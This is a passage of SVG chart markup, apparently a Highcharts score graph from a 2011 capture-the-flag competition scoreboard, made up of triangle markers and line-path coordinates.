Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 345.5 216.68 L 349.5 224.68 341.5 224.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 343.5 218.68 L 347.5 226.68 339.5 226.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 341.5 220.18 L 345.5 228.18 337.5 228.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 340 220.68 L 344 228.68 336 228.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 338 221.18 L 342 229.18 334 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 336 221.18 L 340 229.18 332 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 334 221.18 L 338 229.18 330 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 332 221.18 L 336 229.18 328 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 330 221.18 L 334 229.18 326 229.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 328 221.68 L 332 229.68 324 229.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 326 223.18 L 330 231.18 322 231.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 324 225.18 L 328 233.18 320 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 322 225.18 L 326 233.18 318 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 320 225.18 L 324 233.18 316 233.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 318 227.18 L 322 235.18 314 235.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 316 229.18 L 320 237.18 312 237.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 314 231.68 L 318 239.68 310 239.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 312 233.18 L 316 241.18 308 241.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 310 233.18 L 314 241.18 306 241.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 308 233.18 L 312 241.18 304 241.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 306 233.68 L 310 241.68 302 241.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 304 234.68 L 308 242.68 300 242.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 302 236.68 L 306 244.68 298 244.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 300.5 238.18 L 304.5 246.18 296.5 246.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 298.5 238.18 L 302.5 246.18 294.5 246.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 296.5 238.68 L 300.5 246.68 292.5 246.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 294.5 238.68 L 298.5 246.68 290.5 246.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 292.5 238.68 L 296.5 246.68 288.5 246.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 290.5 238.68 L 294.5 246.68 286.5 246.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 288.5 238.68 L 292.5 246.68 284.5 246.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 286.5 239.18 L 290.5 247.18 282.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 284.5 239.18 L 288.5 247.18 280.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 282.5 239.18 L 286.5 247.18 278.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 280.5 239.18 L 284.5 247.18 276.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 278.5 239.18 L 282.5 247.18 274.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 276.5 239.18 L 280.5 247.18 272.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 274.5 239.18 L 278.5 247.18 270.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 272.5 239.18 L 276.5 247.18 268.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 270.5 239.18 L 274.5 247.18 266.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 268.5 239.18 L 272.5 247.18 264.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 266.5 239.18 L 270.5 247.18 262.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 264.5 239.18 L 268.5 247.18 260.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 262.5 239.18 L 266.5 247.18 258.5 247.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 260.5 239.68 L 264.5 247.68 256.5 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 259 239.68 L 263 247.68 255 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 257 239.68 L 261 247.68 253 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 255 239.68 L 259 247.68 251 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 253 239.68 L 257 247.68 249 247.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 251 240.18 L 255 248.18 247 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 249 240.18 L 253 248.18 245 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 247 240.18 L 251 248.18 243 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 245 240.18 L 249 248.18 241 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 243 240.18 L 247 248.18 239 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 241 240.18 L 245 248.18 237 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 239 240.18 L 243 248.18 235 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 237 240.18 L 241 248.18 233 248.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 235 240.68 L 239 248.68 231 248.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 233 241.68 L 237 249.68 229 249.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 231 241.68 L 235 249.68 227 249.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 229 241.68 L 233 249.68 225 249.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 227 242.18 L 231 250.18 223 250.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 225 243.18 L 229 251.18 221 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 223 243.18 L 227 251.18 219 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 221 243.18 L 225 251.18 217 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 219.5 243.18 L 223.5 251.18 215.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 217.5 243.18 L 221.5 251.18 213.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 215.5 243.18 L 219.5 251.18 211.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 213.5 243.18 L 217.5 251.18 209.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 211.5 243.18 L 215.5 251.18 207.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 209.5 243.18 L 213.5 251.18 205.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 207.5 243.18 L 211.5 251.18 203.5 251.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 205.5 244.18 L 209.5 252.18 201.5 252.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 203.5 245.18 L 207.5 253.18 199.5 253.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 201.5 245.68 L 205.5 253.68 197.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 199.5 245.68 L 203.5 253.68 195.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 197.5 245.68 L 201.5 253.68 193.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 195.5 245.68 L 199.5 253.68 191.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 193.5 245.68 L 197.5 253.68 189.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 191.5 245.68 L 195.5 253.68 187.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 189.5 245.68 L 193.5 253.68 185.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 187.5 245.68 L 191.5 253.68 183.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 185.5 245.68 L 189.5 253.68 181.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 183.5 245.68 L 187.5 253.68 179.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 181.5 245.68 L 185.5 253.68 177.5 253.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 179.5 246.18 L 183.5 254.18 175.5 254.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 178 247.68 L 182 255.68 174 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 176 247.68 L 180 255.68 172 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 174 247.68 L 178 255.68 170 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 172 247.68 L 176 255.68 168 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 170 247.68 L 174 255.68 166 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 168 247.68 L 172 255.68 164 255.68 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 166 248.18 L 170 256.18 162 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 164 248.18 L 168 256.18 160 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 162 248.18 L 166 256.18 158 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 160 248.18 L 164 256.18 156 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 158 248.18 L 162 256.18 154 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 156 248.18 L 160 256.18 152 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 154 248.18 L 158 256.18 150 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 152 248.18 L 156 256.18 148 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 150 248.18 L 154 256.18 146 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 148 248.18 L 152 256.18 144 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 146 248.18 L 150 256.18 142 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 144 248.18 L 148 256.18 140 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 142 248.18 L 146 256.18 138 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 140 248.18 L 144 256.18 136 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 248.18 L 142.5 256.18 134.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 136.5 248.18 L 140.5 256.18 132.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 134.5 248.18 L 138.5 256.18 130.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 248.18 L 136.5 256.18 128.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 248.18 L 134.5 256.18 126.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 128.5 248.18 L 132.5 256.18 124.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 126.5 248.18 L 130.5 256.18 122.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 248.18 L 128.5 256.18 120.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 122.5 248.18 L 126.5 256.18 118.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 120.5 248.18 L 124.5 256.18 116.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 248.18 L 122.5 256.18 114.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 116.5 248.18 L 120.5 256.18 112.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 114.5 248.18 L 118.5 256.18 110.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 248.18 L 116.5 256.18 108.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 110.5 248.18 L 114.5 256.18 106.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 108.5 248.18 L 112.5 256.18 104.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 248.18 L 110.5 256.18 102.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 104.5 248.18 L 108.5 256.18 100.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 102.5 248.18 L 106.5 256.18 98.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 100.5 248.18 L 104.5 256.18 96.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 248.18 L 102.5 256.18 94.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 97 248.18 L 101 256.18 93 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 95 248.18 L 99 256.18 91 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 93 248.18 L 97 256.18 89 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 91 248.18 L 95 256.18 87 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 89 248.18 L 93 256.18 85 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 87 248.18 L 91 256.18 83 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 85 248.18 L 89 256.18 81 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 83 248.18 L 87 256.18 79 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 81 248.18 L 85 256.18 77 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 79 248.18 L 83 256.18 75 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 77 248.18 L 81 256.18 73 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 75 248.18 L 79 256.18 71 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 73 248.18 L 77 256.18 69 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 71 248.18 L 75 256.18 67 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 69 248.18 L 73 256.18 65 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 67 248.18 L 71 256.18 63 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 65 248.18 L 69 256.18 61 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 63 248.18 L 67 256.18 59 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 61 248.18 L 65 256.18 57 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 59 248.18 L 63 256.18 55 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 248.18 L 61.5 256.18 53.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 55.5 248.18 L 59.5 256.18 51.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 53.5 248.18 L 57.5 256.18 49.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 248.18 L 55.5 256.18 47.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 49.5 248.18 L 53.5 256.18 45.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 47.5 248.18 L 51.5 256.18 43.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 45.5 248.18 L 49.5 256.18 41.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 248.18 L 47.5 256.18 39.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 41.5 248.18 L 45.5 256.18 37.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 39.5 248.18 L 43.5 256.18 35.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 248.18 L 41.5 256.18 33.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 35.5 248.18 L 39.5 256.18 31.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 33.5 248.18 L 37.5 256.18 29.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 248.18 L 35.5 256.18 27.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 29.5 248.18 L 33.5 256.18 25.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 27.5 248.18 L 31.5 256.18 23.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 248.18 L 29.5 256.18 21.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 23.5 248.18 L 27.5 256.18 19.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 21.5 248.18 L 25.5 256.18 17.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 19.5 248.18 L 23.5 256.18 15.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 248.18 L 21.5 256.18 13.5 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 16 248.18 L 20 256.18 12 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 14 248.18 L 18 256.18 10 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 12 248.18 L 16 256.18 8 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 10 248.18 L 14 256.18 6 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 8 248.18 L 12 256.18 4 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 6 248.18 L 10 256.18 2 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path><path d="M 4 248.18 L 8 256.18 0 256.18 Z" fill="#DF5353" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-185)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 253.71428571428572 L 75.03475935828877 253.71428571428572 L 77.0103980986334 253.71428571428572 L 78.98603683897802 253.71428571428572 L 80.96167557932264 253.71428571428572 L 82.93731431966727 253.71428571428572 L 84.91295306001189 253.71428571428572 L 86.88859180035651 253.71428571428572 L 88.86423054070113 253.71428571428572 L 90.83986928104575 253.71428571428572 L 92.81550802139039 253.71428571428572 L 94.791146761735 253.71428571428572 L 96.76678550207963 253.71428571428572 L 98.74242424242425 253.71428571428572 L 100.71806298276887 253.71428571428572 L 102.69370172311349 253.71428571428572 L 104.66934046345811 253.71428571428572 L 106.64497920380273 253.71428571428572 L 108.62061794414737 253.71428571428572 L 110.59625668449199 253.71428571428572 L 112.57189542483661 253.71428571428572 L 114.54753416518123 253.71428571428572 L 116.52317290552585 253.71428571428572 L 118.49881164587048 253.71428571428572 L 120.4744503862151 253.71428571428572 L 122.45008912655972 253.71428571428572 L 124.42572786690435 253.71428571428572 L 126.40136660724897 253.71428571428572 L 128.3770053475936 253.71428571428572 L 130.35264408793822 253.71428571428572 L 132.32828282828285 253.71428571428572 L 134.3039215686275 253.71428571428572 L 136.2795603089721 253.71428571428572 L 138.25519904931673 253.71428571428572 L 140.23083778966134 253.71428571428572 L 142.20647653000597 253.71428571428572 L 144.18211527035058 253.71428571428572 L 146.15775401069521 253.71428571428572 L 148.13339275103985 253.71428571428572 L 150.10903149138446 253.71428571428572 L 152.0846702317291 253.71428571428572 L 154.0603089720737 253.71428571428572 L 156.03594771241833 253.71428571428572 L 158.01158645276294 253.71428571428572 L 159.98722519310758 253.71428571428572 L 161.96286393345218 253.71428571428572 L 163.93850267379682 253.71428571428572 L 165.91414141414145 253.71428571428572 L 167.88978015448606 253.71428571428572 L 169.8654188948307 253.71428571428572 L 171.8410576351753 253.71428571428572 L 173.81669637551994 253.71428571428572 L 175.79233511586455 253.71428571428572 L 177.76797385620918 253.71428571428572 L 179.74361259655382 253.71428571428572 L 181.71925133689842 253.71428571428572 L 183.69489007724306 253.71428571428572 L 185.67052881758767 253.71428571428572 L 187.6461675579323 253.71428571428572 L 189.6218062982769 253.71428571428572 L 191.59744503862154 253.71428571428572 L 193.57308377896615 253.71428571428572 L 195.5487225193108 253.71428571428572 L 197.52436125965542 253.71428571428572 L 199.50000000000003 253.71428571428572 L 201.47563874034466 253.71428571428572 L 203.45127748068927 253.71428571428572 L 205.4269162210339 253.71428571428572 L 207.4025549613785 253.71428571428572 L 209.37819370172315 253.71428571428572 L 211.35383244206778 253.71428571428572 L 213.3294711824124 253.71428571428572 L 215.30510992275703 253.71428571428572 L 217.28074866310163 253.71428571428572 L 219.25638740344627 253.71428571428572 L 221.23202614379088 252.77909485714287 L 223.2076648841355 252.77909485714287 L 225.18330362448012 251.843904 L 227.15894236482475 251.38112914285713 L 229.1345811051694 249.09135771428572 L 231.110219845514 249.09135771428572 L 233.08585858585863 249.09135771428572 L 235.06149732620324 249.09135771428572 L 237.03713606654787 249.09135771428572 L 239.01277480689248 249.09135771428572 L 240.98841354723712 248.8401523809523 L 242.96405228758175 248.8401523809523 L 244.93969102792636 248.8401523809523 L 246.915329768271 248.50255451428555 L 248.8909685086156 248.19251565714268 L 250.86660724896024 246.34623679999982 L 252.84224598930484 244.44591679999982 L 254.81788472964945 243.25853394285696 L 256.79352346999406 240.3517293714284 L 258.7691622103387 237.44492479999982 L 260.7448009506833 234.04642194285697 L 262.72043969102793 232.60075794285697 L 264.69607843137254 231.12223794285697 L 266.6717171717172 228.9391392761875 L 268.6473559120618 226.61080327618748 L 270.6229946524064 223.79558956190175 L 272.598633392751 223.79558956190175 L 274.5742721330957 223.79558956190175 L 276.5499108734403 223.25954201904463 L 278.5255496137849 222.7119251047589 L 280.50118835412957 221.62826064761606 L 282.4768270944742 220.56773493333034 L 284.4524658348188 219.4917833904732 L 286.4281045751634 219.1543433904732 L 288.40374331550805 217.6966025904732 L 290.37938205585266 217.15284213333035 L 292.35502079619727 215.6989577904732 L 294.33065953654193 215.14941264761606 L 296.30629827688654 214.43226384761607 L 298.28193701723114 212.21094453333035 L 300.25757575757575 209.94106430475892 L 302.2332144979204 208.78364003047318 L 304.208853238265 208.52479733333067 L 306.1844919786096 208.3280638933307 L 308.1601307189543 207.5211002361878 L 310.1357694592989 206.71413657904498 L 312.1114081996435 206.10070617904495 L 314.0870469399881 205.51934526475924 L 316.0626856803328 204.8001160076164 L 318.0383244206774 204.12812835047356 L 320.013963161022 203.62100423618784 L 321.98960190136665 203.28645657904497 L 323.96524064171126 203.22465177904496 L 325.94087938205587 203.22465177904496 L 327.9165181224005 203.06460880761642 L 329.89215686274514 202.75609223618784 L 331.86779560308975 202.35598480761638 L 333.84343434343435 202.32579280761638 L 335.81907308377896 202.2708078476164 L 337.7947118241236 202.08043079618767 L 339.77035056446823 201.94783971047337 L 341.74598930481284 201.84401982475907 L 343.7216280451575 201.75719315809263 L 345.6972667855021 201.62124233142566 L 347.6729055258467 201.4586368457114 L 349.6485442661913 201.3706825599973 L 351.624183006536 201.2325413333307 L 353.5998217468806 201.18226869333068 L 355.5754604872252 200.70378046475923 L 357.55109922756986 200.70378046475923 L 359.52673796791447 200.70378046475923 L 361.5023767082591 200.70378046475923 L 363.4780154486037 200.70378046475923 L 365.45365418894835 200.70378046475923 L 367.42929292929296 200.70378046475923 L 369.40493166963756 200.0530033219021 L 371.3805704099822 199.58540789333068 L 373.35620915032683 198.7562696076164 L 375.33184789067144 197.34160949333068 L 377.30748663101605 196.16872387047354 L 379.2831253713607 195.06095655618782 L 381.2587641117053 194.14027815618783 L 383.2344028520499 193.44363454475928 L 385.2100415923946 193.44363454475928 L 387.1856803327392 193.44363454475928 L 389.1613190730838 192.3544097980925 L 391.1369578134284 190.75367506285443 L 393.1125965537731 190.161404434283 L 395.0882352941177 189.5237679999973" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 253.71428571428572 L 5.887403446226976 253.71428571428572 L 7.863042186571599 253.71428571428572 L 9.838680926916224 253.71428571428572 L 11.814319667260847 253.71428571428572 L 13.78995840760547 253.71428571428572 L 15.765597147950093 253.71428571428572 L 17.741235888294714 253.71428571428572 L 19.71687462863934 253.71428571428572 L 21.69251336898396 253.71428571428572 L 23.668152109328584 253.71428571428572 L 25.643790849673206 253.71428571428572 L 27.61942959001783 253.71428571428572 L 29.59506833036245 253.71428571428572 L 31.570707070707076 253.71428571428572 L 33.5463458110517 253.71428571428572 L 35.52198455139632 253.71428571428572 L 37.49762329174094 253.71428571428572 L 39.473262032085564 253.71428571428572 L 41.44890077243019 253.71428571428572 L 43.424539512774814 253.71428571428572 L 45.400178253119435 253.71428571428572 L 47.375816993464056 253.71428571428572 L 49.351455733808685 253.71428571428572 L 51.327094474153306 253.71428571428572 L 53.30273321449793 253.71428571428572 L 55.27837195484255 253.71428571428572 L 57.254010695187176 253.71428571428572 L 59.2296494355318 253.71428571428572 L 61.20528817587642 253.71428571428572 L 63.18092691622104 253.71428571428572 L 65.15656565656566 253.71428571428572 L 67.13220439691028 253.71428571428572 L 69.1078431372549 253.71428571428572 L 71.08348187759952 253.71428571428572 L 73.05912061794415 